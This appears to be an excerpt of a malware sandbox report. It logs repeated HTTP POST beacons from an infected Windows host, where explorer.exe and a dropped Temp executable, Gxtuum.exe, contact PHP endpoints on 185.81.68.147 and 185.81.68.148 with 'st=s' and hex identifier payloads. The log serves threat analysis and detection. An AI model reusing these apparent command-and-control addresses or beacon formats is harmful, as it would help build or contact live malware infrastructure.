                                                                                                                                                                                                Dec 13, 2024 08:20:50.776253939 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:52.001760960 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:51 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                106192.168.2.1150079185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:52.242399931 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:52.362292051 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:53.697333097 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:52 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                107192.168.2.1150080185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:53.338649988 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:54.595560074 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:53 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                108192.168.2.1150082185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:53.933423042 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:54.054136992 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:55.388273954 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:54 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                109192.168.2.1150081185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:53.941865921 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:55.273482084 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:54 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                110192.168.2.1150083185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:55.617187977 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:55.737279892 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:57.086164951 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:56 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                111192.168.2.1150084185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:56.862883091 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:58.032808065 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:57 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                112192.168.2.1150085185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:57.119396925 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:58.426666021 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:57 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                113192.168.2.1150086185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:57.320593119 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:57.440711021 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:58.925791025 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:57 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                114192.168.2.1150087185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:59.338237047 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:59.458026886 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:00.793277025 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:59 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                115192.168.2.1150088185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:59.886848927 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:01.237404108 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:00 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                116192.168.2.1150089185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:00.117943048 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:01.470597029 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:00 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                117192.168.2.1150090185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:01.023319006 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:01.143287897 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:02.666415930 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:01 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                118192.168.2.1150091185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:02.914040089 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:03.033948898 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:04.525738955 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:03 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                119192.168.2.1150092185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:03.155030966 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:04.503602028 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:03 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                120192.168.2.1150093185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:03.329755068 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:04.674779892 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:03 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                121192.168.2.1150094185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:04.760838032 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:04.883956909 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:06.369031906 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:05 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                122192.168.2.1150095185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:06.190773010 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:07.534276009 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:06 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                123192.168.2.1150096185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:06.381831884 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:07.722229004 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:07 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
